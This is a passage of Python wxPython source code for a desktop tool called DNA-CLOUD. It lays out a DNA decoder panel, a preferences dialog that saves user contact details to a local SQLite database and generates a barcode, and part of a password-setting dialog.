self.hBox12.Add(self.v1Box)
self.vBox1.Add(self.hBox12,flag = wx.ALIGN_BOTTOM)
self.SetSizer(self.vBox1)
class decodePanel(wx.Panel):
def __init__(self,parent):
wx.Panel.__init__(self,parent = parent,style = wx.TAB_TRAVERSAL)
self.vBox2 = wx.BoxSizer(wx.VERTICAL)
self.vBox2 = wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self ,label = "DNA-DECODER",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(pointSize = 19, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
else:
font = wx.Font(pointSize = 14, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.ALIGN_CENTER | wx.LEFT | wx.TOP , border = 10)
head = wx.StaticText(self ,label = "Generate data file from already encoded DNA files",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT, border = 10)
line2 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
"""
self.cb = wx.ComboBox(self,size=(800,30) ,style=wx.CB_READONLY)
self.vBox2.Add(self.cb,flag = wx.TOP | wx.LEFT | wx.RIGHT , border = 10)
"""
self.hBox23 = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " File Selected : ",style = wx.ALIGN_CENTRE)
self.txt = wx.TextCtrl(self,name = "hBox",style= wx.TE_READONLY)
self.hBox23.Add(path, 2, flag = wx.EXPAND)
self.hBox23.Add(self.txt, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox23,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox24 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Length of DNA String (approx.) : " , style = wx.ALIGN_CENTRE)
self.txt2 = wx.TextCtrl(self,name = "hBox3",style= wx.TE_READONLY)
self.hBox24.Add(content1, 2, flag = wx.EXPAND)
self.hBox24.Add(self.txt2, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox24,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox25 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Number of DNA Chunks (approx.) : " , style = wx.ALIGN_CENTRE)
self.txt3 = wx.TextCtrl(self,name = "hBox3",style= wx.TE_READONLY)
self.hBox25.Add(content1, 2, flag = wx.EXPAND)
self.hBox25.Add(self.txt3, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox25,flag = wx.EXPAND | wx.TOP , border = 10)
self.hBox26 = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Select .dnac File ",size = (160,30))
self.hBox26.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT , border = 20)
self.decodeBut1 = wx.Button(self,label = "Decode selected File ",size = (160,30))
self.hBox26.Add(self.decodeBut1,flag = wx.EXPAND | wx.LEFT , border = 20)
self.vBox2.Add(self.hBox26,flag = wx.TOP | wx.BOTTOM, border = 15)
head = wx.StaticText(self ,label = "Try DNA String just for fun",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line1 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox21 = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Please Write DNA String :", style = wx.ALIGN_CENTRE)
self.txt21 = wx.TextCtrl(self,name = "hBox")
self.hBox21.Add(path, 2,flag = wx.EXPAND)
self.hBox21.Add(self.txt21, 8,flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox21 , flag = wx.EXPAND)
self.hBox22 = wx.BoxSizer(wx.HORIZONTAL)
self.decodeBut = wx.Button(self,label = "Decode",size = (150,30))
self.resetBut = wx.Button(self,label = "Reset",size = (150,30))
self.hBox22.Add(self.decodeBut ,flag = wx.LEFT ,border = 20)
self.hBox22.Add(self.resetBut ,flag = wx.EXPAND | wx.LEFT , border = 20)
self.vBox2.Add(self.hBox22 ,flag = wx.EXPAND | wx.TOP | wx.ALIGN_CENTER, border = 15)
"""
head = wx.StaticText(self,label = "© QR Code generated for given User Details")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
img = wx.EmptyImage(240,240)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox2.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.BOTTOM ,border = 25)
"""
self.dummyhBox = wx.BoxSizer(wx.VERTICAL)
self.vBox2.Add(self.dummyhBox, 2, wx.EXPAND)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line3, flag = wx.EXPAND)
self.hBox27 = wx.BoxSizer(wx.HORIZONTAL)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.Image(name = PATH + '/../icons/DNAicon.png').ConvertToBitmap())
self.hBox27.Add(self.imageCtrl,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.TOP | wx.BOTTOM, border = 25)
self.v1Box= wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self,label = "DNA-CLOUD")
font = wx.Font(11, wx.DEFAULT, wx.NORMAL, wx.BOLD, underline = True)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT | wx.TOP,border = 25)
head = wx.StaticText(self,label = SOFTWARE_DETAILS)
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT , border = 20)
self.hBox27.Add(self.v1Box)
self.vBox2.Add(self.hBox27)
self.SetSizer(self.vBox2)
class Preferences(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
self.WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
#print self.WORKSPACE_PATH
if "linux" in sys.platform:
self.WORKSPACE_PATH = unicodedata.normalize('NFKD', self.WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(self.WORKSPACE_PATH + '/barcode'):
os.mkdir(self.WORKSPACE_PATH + '/barcode')
if con:
con.close()
if "win" in sys.platform and not 'darwin' in sys.platform:
"""
head = wx.StaticText(self ,label = "Select Your Default Folder",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line4 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line4, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxf = wx.BoxSizer(wx.HORIZONTAL)
self.txtf = wx.TextCtrl(self,name = "hBox")
self.hBoxf.Add(self.txtf,proportion = 9 ,flag = wx.EXPAND |wx.RIGHT | wx.LEFT, border = 10)
self.browBut = wx.Button(self,label=" Browse ")
self.hBoxf.Add(self.browBut,proportion = 2,flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 7)
self.vBox.Add(self.hBoxf , flag = wx.TOP | wx.BOTTOM , border = 7)
head = wx.StaticText(self ,label = FOLDER_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
"""
head = wx.StaticText(self ,label = "Enter your details",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Full Name : \t\t\t\t\t\t\t ", style = wx.ALIGN_CENTRE)
self.hBoxa.Add(path, 3, wx.EXPAND)
self.txta = wx.TextCtrl(self,name = "hBox")
self.hBoxa.Add(self.txta, 8, flag = wx.EXPAND | wx.RIGHT , border = 5)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Mobile Number : \t\t\t\t\t", style = wx.ALIGN_CENTRE)
self.hBoxc.Add(path, 3,flag = wx.EXPAND)
self.txtc = wx.TextCtrl(self,name = "hBox")
self.hBoxc.Add(self.txtc, 8,flag = wx.EXPAND | wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Email Address : \t\t\t\t\t ", style = wx.ALIGN_CENTRE)
self.hBoxd.Add(path, 3,flag = wx.EXPAND)
self.txtd = wx.TextCtrl(self,name = "hBox")
self.hBoxd.Add(self.txtd, 8,flag = wx.EXPAND | wx.RIGHT , border = 5)
self.vBox.Add(self.hBoxd, flag = wx.TOP | wx.BOTTOM, border = 7)
self.hBoxb = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = "File Name (Eg a.mkv.dnac): ", style = wx.ALIGN_CENTRE)
self.hBoxb.Add(path,proportion = 2,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtb = wx.TextCtrl(self,name = "hBox")
self.hBoxb.Add(self.txtb,proportion = 5 ,flag = wx.EXPAND |wx.RIGHT, border = 10)
self.vBox.Add(self.hBoxb , flag = wx.TOP | wx.BOTTOM , border = 7)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
try:
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
except IOError:
#"""Permission Error"""
#wx.MessageDialog(self,'Permission Denied. Please start the software in administrator mode.', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
#sys.exit(0)
shutil.copyfile(PATH + '/../icons/barcode.png',self.WORKSPACE_PATH + '/barcode/barcode.png')
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
if not os.path.isdir(self.WORKSPACE_PATH + '/.temp'):
os.mkdir(self.WORKSPACE_PATH +'/.temp')
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox.Add(self.imageCtrl,flag = wx.LEFT | wx.RIGHT |wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = PREF_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.barcodeBut = wx.Button(self,label=" Generate Barcode ")
self.cancelBut = wx.Button(self,label=" Close ")
self.hBoxe.Add(self.saveBut, flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.barcodeBut, flag = wx.RIGHT | wx.wx.LEFT , border = 10)
self.hBoxe.Add(self.cancelBut, flag = wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxe, flag = wx.TOP | wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTRE_VERTICAL |wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform or 'darwin' in sys.platform:
"""
head = wx.StaticText(self ,label = "Select Your Default Folder",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line4 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line4, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxf = wx.BoxSizer(wx.HORIZONTAL)
self.txtf = wx.TextCtrl(self,name = "hBox")
self.hBoxf.Add(self.txtf,proportion = 9 ,flag = wx.EXPAND |wx.RIGHT | wx.LEFT, border = 10)
self.browBut = wx.Button(self,label=" Browse ")
self.hBoxf.Add(self.browBut,proportion = 2,flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 7)
self.vBox.Add(self.hBoxf , flag = wx.TOP | wx.BOTTOM , border = 7)
head = wx.StaticText(self ,label = FOLDER_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
"""
head = wx.StaticText(self ,label = "Enter your details",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Full Name :", style = wx.ALIGN_CENTRE)
self.hBoxa.Add(path,proportion = 1,flag = wx.EXPAND|wx.LEFT ,border = 5)
self.txta = wx.TextCtrl(self,name = "hBox")
self.hBoxa.Add(self.txta,proportion = 4,flag = wx.EXPAND | wx.LEFT , border = 110)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Contact Number :", style = wx.ALIGN_CENTRE)
self.hBoxc.Add(path,proportion = 1,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtc = wx.TextCtrl(self,name = "hBox")
self.hBoxc.Add(self.txtc,proportion = 2 ,flag = wx.EXPAND | wx.LEFT , border = 60)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Email Address :", style = wx.ALIGN_CENTRE)
self.hBoxd.Add(path,proportion= 1,flag = wx.EXPAND|wx.LEFT , border = 7)
self.txtd = wx.TextCtrl(self,name = "hBox")
self.hBoxd.Add(self.txtd,proportion = 3,flag = wx.EXPAND | wx.LEFT , border = 75)
self.vBox.Add(self.hBoxd, flag = wx.TOP | wx.BOTTOM, border = 7)
self.hBoxb = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = "File Name (Eg. a.png.dnac):", style = wx.ALIGN_CENTRE)
self.hBoxb.Add(path,proportion = 1.5,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtb = wx.TextCtrl(self,name = "hBox")
self.hBoxb.Add(self.txtb,proportion = 2,flag = wx.EXPAND)
self.vBox.Add(self.hBoxb , flag = wx.TOP | wx.BOTTOM , border = 7)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
try:
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
except IOError:
#"""Permission Error"""
#wx.MessageDialog(self,'Permission Denied. Please start the software in administrator mode.', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
#sys.exit(0)
shutil.copyfile(PATH + '/../icons/barcode.png',self.WORKSPACE_PATH + '/barcode/barcode.png')
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
if not os.path.isdir(self.WORKSPACE_PATH + '/.temp'):
os.mkdir(self.WORKSPACE_PATH +'/.temp')
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox.Add(self.imageCtrl,flag = wx.LEFT | wx.ALIGN_CENTER_HORIZONTAL , border = 10)
head = wx.StaticText(self ,label = PREF_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
if 'darwin' in sys.platform:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(570)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
else:
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(550)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label="Save")
self.barcodeBut = wx.Button(self,label="Generate Barcode")
self.cancelBut = wx.Button(self,label="Close")
self.hBoxe.Add(self.saveBut, flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.barcodeBut, flag = wx.RIGHT | wx.wx.LEFT , border = 10)
self.hBoxe.Add(self.cancelBut, flag = wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxe, flag = wx.TOP | wx.ALIGN_CENTER_HORIZONTAL | wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
self.Layout()
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.barcodeBut.Bind(wx.EVT_BUTTON,self.generate)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
#self.browBut.Bind(wx.EVT_BUTTON,self.onChoose)
#self.SetSize((500,450))
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = (cur.execute('SELECT * FROM prefs where id = 1').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txta.WriteText(string)
string = (cur.execute('SELECT * FROM prefs where id = 2').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txtc.WriteText(string)
string = (cur.execute('SELECT * FROM prefs where id = 3').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txtd.WriteText(string)
if con:
con.close()
def onChoose(self,e):
locationSelector = wx.DirDialog(self,"Please select default location to save all your file",style = wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
if locationSelector.ShowModal() == wx.ID_OK:
paths = locationSelector.GetPath()
if "win" in sys.platform:
self.savePath = paths
elif "linux" in sys.platform:
self.savePath = unicodedata.normalize('NFKD', paths).encode('ascii','ignore')
self.txtf.Clear()
self.txtf.WriteText(self.savePath)
else:
self.savePath = None
def save(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
try:
cur = con.cursor()
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txta.GetString(0,self.txta.GetLastPosition()),len("x")))
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtc.GetString(0,self.txtc.GetLastPosition()),len("xy")))
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),len("xyz")))
cur.execute('UPDATE prefs SET details = "true" WHERE id = 4')
#if not self.txtf.IsEmpty():
# cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtf.GetString(0,self.txtf.GetLastPosition()),7))
#else:
# cur.execute('UPDATE prefs SET details = "None" WHERE id = 7')
con.commit()
except sqlite3.OperationalError:
DATABASE_ERROR = True
if con:
con.close()
self.Destroy()
def generate(self,e):
barcodeGenerator.generate(self.txta.GetString(0,self.txta.GetLastPosition()) + "-" + self.txtb.GetString(0,self.txtb.GetLastPosition())+ "-" + self.txtc.GetString(0,self.txtc.GetLastPosition()) + "-" + self.txtd.GetString(0,self.txtd.GetLastPosition()),self.WORKSPACE_PATH + "/barcode/")
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl.SetBitmap(wx.BitmapFromImage(img))
self.Refresh()
def cancel(self,e):
self.Destroy()
#dialog used to set or change password
class setPasswordDialog(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if "win" in sys.platform and not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Please Enter your password",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Old Password :\t\t")
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if string == 'false':
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_READONLY)
else:
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxa.Add(path,1,wx.EXPAND)
self.hBoxa.Add(self.txta,3,wx.EXPAND | wx.RIGHT ,border = 10)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " New Password :\t ")
self.txtc = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxc.Add(path, 1, flag = wx.EXPAND)
self.hBoxc.Add(self.txtc, 3, wx.EXPAND | wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Confirm Password : ")
self.txtd = wx.TextCtrl(self,name = "hBox1",style = wx.TE_PASSWORD)
self.hBoxd.Add(path, 1, flag = wx.EXPAND)
self.hBoxd.Add(self.txtd, 3, flag = wx.EXPAND | wx.RIGHT,border = 10)
self.vBox.Add(self.hBoxd,flag = wx.TOP | wx.BOTTOM, border = 7)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = "It is recommended that you use password to keep your data private")
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.RIGHT , border = 5)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.cancelBut = wx.Button(self,label=" Cancel ")
self.hBoxe.Add(self.saveBut,flag = wx.RIGHT | wx.BOTTOM, border = 10)
self.hBoxe.Add(self.cancelBut,flag = wx.LEFT | wx.BOTTOM, border = 10)
self.vBox.Add(self.hBoxe, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL)
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform or 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Please Enter your password",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Old Password :\t")
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
if string == 'false':
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_READONLY)
else:
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxa.Add(path,1,wx.EXPAND)
self.hBoxa.Add(self.txta,3,wx.EXPAND | wx.LEFT , border = 10)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " New Password :\t")
self.hBoxc.Add(path,proportion =1,flag = wx.EXPAND)
self.txtc = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxc.Add(self.txtc,proportion = 3 ,flag = wx.EXPAND | wx.LEFT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Confirm Password :")
self.hBoxd.Add(path,1,flag = wx.EXPAND)
self.txtd = wx.TextCtrl(self,name = "hBox1",style = wx.TE_PASSWORD)
self.hBoxd.Add(self.txtd,3,flag = wx.EXPAND)
self.vBox.Add(self.hBoxd,flag = wx.TOP | wx.BOTTOM, border = 7)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = "It is recommended that you use password to keep your data private")
if not 'darwin' in sys.platform:
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.ALIGN_CENTER_HORIZONTAL)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.cancelBut = wx.Button(self,label=" Cancel ")
self.hBoxe.Add(self.saveBut,flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.cancelBut,flag = wx.LEFT , border = 10)
